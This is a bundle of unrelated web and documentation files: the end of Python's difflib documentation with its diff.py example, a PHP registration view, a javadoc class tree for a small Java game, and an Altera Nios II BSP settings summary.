<span class="gp">>>> </span><span class="n">sys</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">writelines</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
<span class="go"> 1. Beautiful is better than ugly.</span>
<span class="go">- 2. Explicit is better than implicit.</span>
<span class="go">- 3. Simple is better than complex.</span>
<span class="go">+ 3. Simple is better than complex.</span>
<span class="go">? ++</span>
<span class="go">- 4. Complex is better than complicated.</span>
<span class="go">? ^ ---- ^</span>
<span class="go">+ 4. Complicated is better than complex.</span>
<span class="go">? ++++ ^ ^</span>
<span class="go">+ 5. Flat is better than nested.</span>
</pre></div>
</div>
</div>
<div class="section" id="a-command-line-interface-to-difflib">
<span id="difflib-interface"></span><h2>6.3.5. A command-line interface to difflib<a class="headerlink" href="#a-command-line-interface-to-difflib" title="Permalink to this headline">¶</a></h2>
<p>This example shows how to use difflib to create a <tt class="docutils literal"><span class="pre">diff</span></tt>-like utility.
It is also contained in the Python source distribution, as
<tt class="file docutils literal"><span class="pre">Tools/scripts/diff.py</span></tt>.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="sd">""" Command line interface to difflib.py providing diffs in four formats:</span>
<span class="sd">* ndiff: lists every line and highlights interline changes.</span>
<span class="sd">* context: highlights clusters of changes in a before/after format.</span>
<span class="sd">* unified: highlights clusters of changes in an inline format.</span>
<span class="sd">* html: generates side by side comparison with change highlights.</span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">sys</span><span class="o">,</span> <span class="nn">os</span><span class="o">,</span> <span class="nn">time</span><span class="o">,</span> <span class="nn">difflib</span><span class="o">,</span> <span class="nn">optparse</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="c"># Configure the option parser</span>
<span class="n">usage</span> <span class="o">=</span> <span class="s">"usage: %prog [options] fromfile tofile"</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="o">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="n">usage</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-c"</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s">"store_true"</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="k">False</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s">'Produce a context format diff (default)'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s">"store_true"</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="k">False</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s">'Produce a unified format diff'</span><span class="p">)</span>
<span class="n">hlp</span> <span class="o">=</span> <span class="s">'Produce HTML side by side diff (can use -c and -l in conjunction)'</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-m"</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s">"store_true"</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="k">False</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="n">hlp</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-n"</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s">"store_true"</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="k">False</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s">'Produce a ndiff format diff'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-l"</span><span class="p">,</span> <span class="s">"--lines"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"int"</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="mi">3</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s">'Set number of context lines (default 3)'</span><span class="p">)</span>
<span class="p">(</span><span class="n">options</span><span class="p">,</span> <span class="n">args</span><span class="p">)</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">args</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">parser</span><span class="o">.</span><span class="n">print_help</span><span class="p">()</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">args</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">parser</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s">"need to specify both a fromfile and tofile"</span><span class="p">)</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">options</span><span class="o">.</span><span class="n">lines</span>
<span class="n">fromfile</span><span class="p">,</span> <span class="n">tofile</span> <span class="o">=</span> <span class="n">args</span> <span class="c"># as specified in the usage string</span>
<span class="c"># we're passing these as arguments to the diff function</span>
<span class="n">fromdate</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">ctime</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">stat</span><span class="p">(</span><span class="n">fromfile</span><span class="p">)</span><span class="o">.</span><span class="n">st_mtime</span><span class="p">)</span>
<span class="n">todate</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">ctime</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">stat</span><span class="p">(</span><span class="n">tofile</span><span class="p">)</span><span class="o">.</span><span class="n">st_mtime</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">fromfile</span><span class="p">)</span> <span class="k">as</span> <span class="n">fromf</span><span class="p">,</span> <span class="nb">open</span><span class="p">(</span><span class="n">tofile</span><span class="p">)</span> <span class="k">as</span> <span class="n">tof</span><span class="p">:</span>
<span class="n">fromlines</span><span class="p">,</span> <span class="n">tolines</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">fromf</span><span class="p">),</span> <span class="nb">list</span><span class="p">(</span><span class="n">tof</span><span class="p">)</span>
<span class="k">if</span> <span class="n">options</span><span class="o">.</span><span class="n">u</span><span class="p">:</span>
<span class="n">diff</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">unified_diff</span><span class="p">(</span><span class="n">fromlines</span><span class="p">,</span> <span class="n">tolines</span><span class="p">,</span> <span class="n">fromfile</span><span class="p">,</span> <span class="n">tofile</span><span class="p">,</span>
<span class="n">fromdate</span><span class="p">,</span> <span class="n">todate</span><span class="p">,</span> <span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">options</span><span class="o">.</span><span class="n">n</span><span class="p">:</span>
<span class="n">diff</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">ndiff</span><span class="p">(</span><span class="n">fromlines</span><span class="p">,</span> <span class="n">tolines</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">options</span><span class="o">.</span><span class="n">m</span><span class="p">:</span>
<span class="n">diff</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">HtmlDiff</span><span class="p">()</span><span class="o">.</span><span class="n">make_file</span><span class="p">(</span><span class="n">fromlines</span><span class="p">,</span> <span class="n">tolines</span><span class="p">,</span> <span class="n">fromfile</span><span class="p">,</span>
<span class="n">tofile</span><span class="p">,</span> <span class="n">context</span><span class="o">=</span><span class="n">options</span><span class="o">.</span><span class="n">c</span><span class="p">,</span>
<span class="n">numlines</span><span class="o">=</span><span class="n">n</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">diff</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">context_diff</span><span class="p">(</span><span class="n">fromlines</span><span class="p">,</span> <span class="n">tolines</span><span class="p">,</span> <span class="n">fromfile</span><span class="p">,</span> <span class="n">tofile</span><span class="p">,</span>
<span class="n">fromdate</span><span class="p">,</span> <span class="n">todate</span><span class="p">,</span> <span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">)</span>
<span class="c"># we're using writelines because diff is a generator</span>
<span class="n">sys</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">writelines</span><span class="p">(</span><span class="n">diff</span><span class="p">)</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar">
<div class="sphinxsidebarwrapper">
<h3><a href="../contents.html">Table Of Contents</a></h3>
<ul>
<li><a class="reference internal" href="#">6.3. <tt class="docutils literal"><span class="pre">difflib</span></tt> — Helpers for computing deltas</a><ul>
<li><a class="reference internal" href="#sequencematcher-objects">6.3.1. SequenceMatcher Objects</a></li>
<li><a class="reference internal" href="#sequencematcher-examples">6.3.2. SequenceMatcher Examples</a></li>
<li><a class="reference internal" href="#differ-objects">6.3.3. Differ Objects</a></li>
<li><a class="reference internal" href="#differ-example">6.3.4. Differ Example</a></li>
<li><a class="reference internal" href="#a-command-line-interface-to-difflib">6.3.5. A command-line interface to difflib</a></li>
</ul>
</li>
</ul>
<h4>Previous topic</h4>
<p class="topless"><a href="re.html"
title="previous chapter">6.2. <tt class="docutils literal"><span class="pre">re</span></tt> — Regular expression operations</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="textwrap.html"
title="next chapter">6.4. <tt class="docutils literal"><span class="pre">textwrap</span></tt> — Text wrapping and filling</a></p>
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="../bugs.html">Report a Bug</a></li>
<li><a href="../_sources/library/difflib.txt"
rel="nofollow">Show Source</a></li>
</ul>
<div id="searchbox" style="display: none">
<h3>Quick search</h3>
<form class="search" action="../search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="../genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="../py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="textwrap.html" title="6.4. textwrap — Text wrapping and filling"
>next</a> |</li>
<li class="right" >
<a href="re.html" title="6.2. re — Regular expression operations"
>previous</a> |</li>
<li><img src="../_static/py.png" alt=""
style="vertical-align: middle; margin-top: -1px"/></li>
<li><a href="https://www.python.org/">Python</a> »</li>
<li>
<span class="version_switcher_placeholder">3.4.3</span>
<a href="../index.html">Documentation</a> »
</li>
<li><a href="index.html" >The Python Standard Library</a> »</li>
<li><a href="text.html" >6. Text Processing Services</a> »</li>
</ul>
</div>
<div class="footer">
© <a href="../copyright.html">Copyright</a> 1990-2015, Python Software Foundation.
<br />
The Python Software Foundation is a non-profit corporation.
<a href="https://www.python.org/psf/donations/">Please donate.</a>
<br />
Last updated on Feb 26, 2015.
<a href="../bugs.html">Found a bug</a>?
<br />
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.3.
</div>
</body>
</html> |
application/views/register/index.html | tfowler4/RiftProgress | <div id="content" class="container-fluid">
<div class="row">
<div class="col-md-10 col-md-push-1 col-xs-12">
<?php if ( $this->alert) { echo $this->alert->getHtml(); } ?>
<div class="row">
<div class="col-md-4 col-md-push-4 col-xs-12">
<h2 class="text-center">Registration only takes a second... <br> <small>No really it does</small></h2>
<div class="well">
<div class="text-center">
<i style="font-size:200px;" class="fa fa-user-circle"></i>
</div>
<div class="row">
<div class="col-xs-12">
<?php echo $this->_loadView('forms/register-form', $this->_data); ?>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div> |
doc/fr/tactik/game/package-tree.html | TacTik/braveCat | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="fr">
<head>
<!-- Generated by javadoc (version 1.7.0_79) on Fri May 15 18:14:52 CEST 2015 -->
<title>fr.tactik.game Class Hierarchy</title>
<meta name="date" content="2015-05-15">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="fr.tactik.game Class Hierarchy";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../fr/tactik/editor/package-tree.html">Prev</a></li>
<li><a href="../../../handlers/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?fr/tactik/game/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For Package fr.tactik.game</h1>
<span class="strong">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">java.awt.Component (implements java.awt.image.ImageObserver, java.awt.MenuContainer, java.io.Serializable)
<ul>
<li type="circle">java.awt.Container
<ul>
<li type="circle">javax.swing.JComponent (implements java.io.Serializable)
<ul>
<li type="circle">javax.swing.JMenuBar (implements javax.accessibility.Accessible, javax.swing.MenuElement)
<ul>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/Menu.html" title="class in fr.tactik.game"><span class="strong">Menu</span></a></li>
</ul>
</li>
<li type="circle">javax.swing.JPanel (implements javax.accessibility.Accessible)
<ul>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/GameDisplay.html" title="class in fr.tactik.game"><span class="strong">GameDisplay</span></a> (implements java.lang.Runnable)</li>
</ul>
</li>
</ul>
</li>
<li type="circle">java.awt.Window (implements javax.accessibility.Accessible)
<ul>
<li type="circle">java.awt.Frame (implements java.awt.MenuContainer)
<ul>
<li type="circle">javax.swing.JFrame (implements javax.accessibility.Accessible, javax.swing.RootPaneContainer, javax.swing.WindowConstants)
<ul>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/GameWindow.html" title="class in fr.tactik.game"><span class="strong">GameWindow</span></a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/ControlerPlayer.html" title="class in fr.tactik.game"><span class="strong">ControlerPlayer</span></a> (implements java.awt.event.KeyListener)</li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/Entity.html" title="class in fr.tactik.game"><span class="strong">Entity</span></a>
<ul>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/Mobile.html" title="class in fr.tactik.game"><span class="strong">Mobile</span></a>
<ul>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/Foes.html" title="class in fr.tactik.game"><span class="strong">Foes</span></a></li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/MobilePlat.html" title="class in fr.tactik.game"><span class="strong">MobilePlat</span></a></li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/Player.html" title="class in fr.tactik.game"><span class="strong">Player</span></a></li>
</ul>
</li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/Still.html" title="class in fr.tactik.game"><span class="strong">Still</span></a>
<ul>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/StillPlat.html" title="class in fr.tactik.game"><span class="strong">StillPlat</span></a></li>
</ul>
</li>
</ul>
</li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/GameLoader.html" title="class in fr.tactik.game"><span class="strong">GameLoader</span></a></li>
<li type="circle">fr.tactik.game.<a href="../../../fr/tactik/game/MainGame.html" title="class in fr.tactik.game"><span class="strong">MainGame</span></a></li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../fr/tactik/editor/package-tree.html">Prev</a></li>
<li><a href="../../../handlers/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?fr/tactik/game/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
documentations/Bumblebee_Documentation/SoPC/NIOS_MCAPI_Base_v07/software/BSPv02/summary.html | XCopter-HSU/XCopter | <html xmlns:gen="http://www.altera.com/embeddedsw/bsp/schema">
<title>Altera Nios II BSP Summary</title>
<body>
<h3>BSP Description</h3>
<table border="1" bgcolor="#FFFFCC" width="90%">
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">BSP Type:</td><td>hal</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">SOPC Design File:</td><td>..\..\soc_system.sopcinfo</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">Quartus JDI File:</td><td>default</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">CPU:</td><td>cpu_s0</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">BSP Settings File:</td><td>.\settings.bsp</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">BSP Version:</td><td>default</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">BSP Generated On:</td><td>10.12.2014 14:27:10</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">BSP Generated Timestamp:</td><td>1418218030299</td>
</tr>
<tr mode="wrap">
<td width="20%" bgcolor="#77BBFF">BSP Generated Location:</td><td>H:\Projekt2_Neu\NIOS_MCAPI_Base_v04\NIOS_MCAPI_Base_v04\software\BSPv02</td>
</tr>
</table>
<br>
<h3>Nios II Memory Map</h3>
<table border="1" bgcolor="#FFFFCC" width="90%">
<tr bgcolor="#77BBFF" mode="wrap">
<th align="left" width="20%">Slave Descriptor</th><th align="left" width="40%">Address Range</th><th align="left" width="20%">Size</th><th align="left" width="20%">Attributes</th>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>fifo_bridge_cpus0_cpus1</td><td>0x09004400 - 0x090047FF</td><td>1024</td><td class="listing"> </td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>fifo_bridge_cpuM_cpus0</td><td>0x09004000 - 0x090043FF</td><td>1024</td><td class="listing"> </td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>i2c_cpu_s0</td><td>0x09000040 - 0x0900007F</td><td>64</td><td class="listing"> </td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>pio_aliveTest_cpu_s0</td><td>0x09000030 - 0x0900004F</td><td>32</td><td class="listing"> </td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>pwm_cpu_s0_1</td><td>0x09000028 - 0x0900002B</td><td>4</td><td class="listing"> </td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>jtag_uart_cpu_s0</td><td>0x09000020 - 0x0900002F</td><td>16</td><td class="listing">printable</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>timer_cpu_s0</td><td>0x09000000 - 0x0900003F</td><td>64</td><td class="listing">timer</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>sdram</td><td>0x00000000 - 0x03FFFFFF</td><td>67108864</td><td class="listing">memory</td>
</tr>
</table>
<br>
<br>
<h3>Linker Regions</h3>
<table border="1" bgcolor="#FFFFCC" width="90%">
<tr bgcolor="#77BBFF" mode="wrap">
<th align="left" width="15%">Region</th><th align="left" width="40%">Address Range</th><th align="left" width="15%">Size</th><th align="left" width="15%">Memory</th><th align="left" width="15%">Offset</th>
</tr>
</table>
<br>
<br>
<h3>Linker Section Mappings</h3>
<table border="1" bgcolor="#FFFFCC" width="50%">
<tr bgcolor="#77BBFF" mode="wrap">
<th align="left" width="50%">Section</th><th align="left" width="50%">Region</th>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>.text</td><td>sdram</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>.rodata</td><td>sdram</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>.rwdata</td><td>sdram</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>.bss</td><td>sdram</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>.heap</td><td>sdram</td>
</tr>
<tr mode="wrap" STYLE="display: 'block'; font-family: 'courier'; color: '#000000'; font-weight: '500'; font-size: '14'; margin-top: '10pt'; text-align: 'left'">
<td>.stack</td><td>sdram</td>
</tr>
</table>
<h3>Settings</h3>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">altera_avalon_jtag_uart_driver.enable_jtag_uart_ignore_fifo_full_error</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALTERA_AVALON_JTAG_UART_IGNORE_FIFO_FULL_ERROR</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>false</td>
</tr>
<tr>
<td width="20%">Value:</td><td>false</td>
</tr>
<tr>
<td width="20%">Type:</td><td>BooleanDefineOnly</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable JTAG UART driver to recover when host is inactive causing buffer to full without returning error. Printf will not fail with this recovery.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">altera_avalon_jtag_uart_driver.enable_small_driver</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALTERA_AVALON_JTAG_UART_SMALL</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>false</td>
</tr>
<tr>
<td width="20%">Value:</td><td>false</td>
</tr>
<tr>
<td width="20%">Type:</td><td>BooleanDefineOnly</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Small-footprint (polled mode) driver</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.custom_newlib_flags</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>CUSTOM_NEWLIB_FLAGS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Value:</td><td>none</td>
</tr>
<tr>
<td width="20%">Type:</td><td>UnquotedString</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Build a custom version of newlib with the specified space-separated compiler flags.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>The custom newlib build will be placed in the &lt;bsp root>/newlib directory, and will be used only for applications that utilize this BSP.</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_c_plus_plus</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_NO_C_PLUS_PLUS</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Enable support for a subset of the C++ language. This option increases code footprint by adding support for C++ constructors. Certain features, such as multiple inheritance and exceptions are not supported. If false, adds -DALT_NO_C_PLUS_PLUS to ALT_CPPFLAGS in public.mk, and reduces code footprint.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_clean_exit</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_NO_CLEAN_EXIT</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>When your application exits, close file descriptors, call C++ destructors, etc. Code footprint can be reduced by disabling clean exit. If disabled, adds -DALT_NO_CLEAN_EXIT to ALT_CPPFLAGS -D'exit(a)=_exit(a)' in public.mk.</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
<br>
<table border="1" bgcolor="#FFFFCC" width="60%">
<tr bgcolor="#77BBFF">
<td align="left" width="15%">Setting Name:</td><td align="left">hal.enable_exit</td>
</tr>
<tr>
<td width="20%">Identifier:</td><td>ALT_NO_EXIT</td>
</tr>
<tr>
<td width="20%">Default Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Value:</td><td>1</td>
</tr>
<tr>
<td width="20%">Type:</td><td>Boolean</td>
</tr>
<tr mode="wrap">
<td width="20%">Destination:</td><td>public_mk_define</td>
</tr>
<tr mode="wrap">
<td width="20%">Description:</td><td>Add exit() support. This option increases code footprint if your "main()" routine does "return" or call "exit()". If false, adds -DALT_NO_EXIT to ALT_CPPFLAGS in public.mk, and reduces footprint</td>
</tr>
<tr mode="wrap">
<td width="20%">Restrictions:</td><td>none</td>
</tr>
</table>
